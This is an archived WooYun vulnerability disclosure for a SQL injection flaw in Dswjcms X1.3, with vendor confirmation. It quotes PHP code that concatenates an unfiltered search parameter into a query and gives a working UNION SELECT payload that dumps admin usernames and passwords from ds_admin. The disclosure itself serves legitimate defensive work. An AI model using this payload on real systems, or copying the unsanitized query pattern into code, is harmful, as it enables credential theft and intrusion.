当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143747

漏洞标题:Dswjcms! X1.3 sql注入

相关厂商:dswjcms.com

漏洞作者: 不能忍

提交时间:2015-10-07 09:48

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-11: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-02: 细节向核心白帽子及相关领域专家公开
2015-12-12: 细节向普通白帽子公开
2015-12-22: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

/Lib/Action/Win/IndexAction.class.php

public function invest(){

$this->assign('title','我要投资');
$Borrowing = D('Borrowing');
import('ORG.Util.Page');// 导入分页类
$where='(state=1 or state=10 or state=11)';
if($this->_get('search')){
$where.=" and `title` LIKE '%".$this->_get('search')."%'";//这里直接进库没有过滤
}
$count = $Borrowing->where($where)->count();// 查询满足要求的总记录数
$Page = new Page($count,10);// 实例化分页类 传入总记录数和每页显示的记录数数
$show = $Page->show();// 分页显示输出
$borrow=$this->borrow_unicoms($where,$Page->firstRow.','.$Page->listRows);
$this->assign('borrow',$borrow);
$this->assign('page',$show);// 赋值分页输出
//标题、关键字、描述
$Site = D("Site");
$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();
$this->assign('si',$site);
$active['loan']='active';
$this->assign('active',$active);
$endjs='


payload:
localhost/Win/Index/invest/?search=112323%') UNION SELECT 1,2,3,concat(username,0x2c,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from ds_admin%23

漏洞证明:

1.jpg

修复方案:

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-08 08:28

厂商回复:

此类问题已经处理,已在官方论坛贴出修复办法,并在新版本中已测试无法执行,感谢楼主的宝贵意见

最新状态:

暂无